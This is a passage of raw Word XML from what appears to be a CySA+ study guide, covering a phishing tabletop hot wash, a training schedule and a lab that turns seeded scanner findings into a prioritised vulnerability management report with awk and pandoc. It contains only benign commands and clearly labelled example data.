          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Hot Wash — Tabletop Phishing Exercise</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What went well</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Triage time within SLA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Comms had the template ready.</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What went badly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- EDR isolation on legacy 2012 host failed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Out-of-band comms channel out of date.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- No regulator notification template available.</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Action items</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| # | Action | Owner | Due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1 | Network-ACL isolation for legacy hosts | Platform | $(date -d '+14 days' -I) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 2 | Refresh OOB Signal group quarterly | SOC | $(date -d '+30 days' -I) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 3 | Build regulator notification template | Legal | $(date -d '+30 days' -I) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>These actions become the inputs to the next Preparation cycle — closing the NIST loop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Training (CySA+ 3.3 "Training")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Schedule four touches per year:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q1 — All-hands phishing simulation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q2 — Tabletop (this lab).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q3 — Red-team purple-team exercise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q4 — Full BC/DR simulated outage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The NIST 800-61 IR life cycle and how it maps to CySA+ 3.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Draft a high-level IR plan with RACI, severity, and escalation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Author a one-page playbook for the most common incident type.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run a structured tabletop and capture lessons learned that feed back into preparation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to the NIST 800-61 IR life cycle and how it maps to CySA+ 3.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Topic 4: Reporting and Communication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CompTIA CySA+ CS0-003 exam weighting: 17%. Hands-on Labs 26–30.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 26 — Vulnerability Management Report</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turn raw OpenVAS / Nmap output into a stakeholder-ready vulnerability report with a risk score, affected hosts, mitigations, and an action plan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will turn raw OpenVAS / Nmap output into a stakeholder-ready vulnerability report with a risk score, affected hosts, mitigations, and an action plan. This maps to CySA+ 4.1 (Vulnerability management reporting — Vulnerabilities, Affected hosts, Risk score, Mitigation, Recurrence, Prioritization; Compliance reports; Action plans; Inhibitors to remediation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Install report tooling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y pandoc texlive-latex-base texlive-fonts-recommended 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>pandoc converts Markdown → PDF / HTML / DOCX with one command. The TeX packages are large; if Killercoda is slow, skip them and render to HTML instead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Seed input data (pretend it came from OpenVAS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mkdir -p /tmp/lab26 &amp;&amp; cd /tmp/lab26</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; findings.csv &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CVE,Host,Service,CVSS,EPSS,KEV,FirstSeen,Status</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CVE-2024-1234,web01.example,nginx 1.18,9.8,0.97,Yes,2026-05-01,Open</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CVE-2024-2222,web01.example,openssl 1.1.1,7.5,0.21,No,2026-05-01,Open</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CVE-2023-9999,db01.example,mysql 5.7,8.2,0.45,No,2026-04-15,Open-Recurring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CVE-2022-1111,jump01.example,openssh 7.6,6.5,0.10,No,2026-05-12,Open</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CVE-2021-5555,legacy01.example,iis 7.5,9.8,0.88,Yes,2026-01-01,Accepted-Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The columns map directly to CySA+ 4.1's bullet list: Vulnerabilities, Affected hosts, Risk score, Recurrence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Compute the prioritisation column</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>awk -F, 'NR==1 {print $0",Priority"; next}</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xml:space="preserve">    score = $4 + 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if ($6 == "Yes" || score &gt;= 9.0) p="P1"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    else if (score &gt;= 7.0)            p="P2"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    else if (score &gt;= 4.0)            p="P3"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    else                              p="P4"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    print $0","p</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  }' findings.csv &gt; prioritised.csv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>column -ts, prioritised.csv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Prioritisation logic mirrors CySA+ 2.3 + 4.1: KEV catalog hits and CVSS ≥ 9 are always P1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Build the executive summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; report.md &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Monthly Vulnerability Management Report — May 2026</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**Audience:** CISO, Engineering leads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>**Prepared by:** SOC Vulnerability Management Team</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>**Reporting period:** 2026-05-01 → 2026-05-13</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Executive summary</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This month we identified **5 open vulnerabilities** across 4 hosts. Two are on the CISA Known Exploited Vulnerabilities (KEV) catalog and require P1 action. One issue is **recurring** on `db01` — patch reverted by a configuration rollback on 2026-05-08 (root cause: change-management gap).</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Metric (KPI) | This period | Last period | Δ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Total open | 5 | 4 | +1 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| P1 critical | 2 | 1 | +1 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Mean time to remediate (MTTR) | 18 days | 22 days | −4 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| % patched within SLA | 78% | 71% | +7 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Recurring findings | 1 | 0 | +1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Top 10 vulnerabilities (CySA+ 4.1 "Top 10")</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 | CVE | Host | CVSS | KEV | Priority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1 | CVE-2024-1234 | web01 | 9.8 | Yes | P1 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 2 | CVE-2021-5555 | legacy01 | 9.8 | Yes | P1 (Risk Accepted) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 3 | CVE-2023-9999 | db01 | 8.2 | No | P2 (Recurring) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 4 | CVE-2024-2222 | web01 | 7.5 | No | P2 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
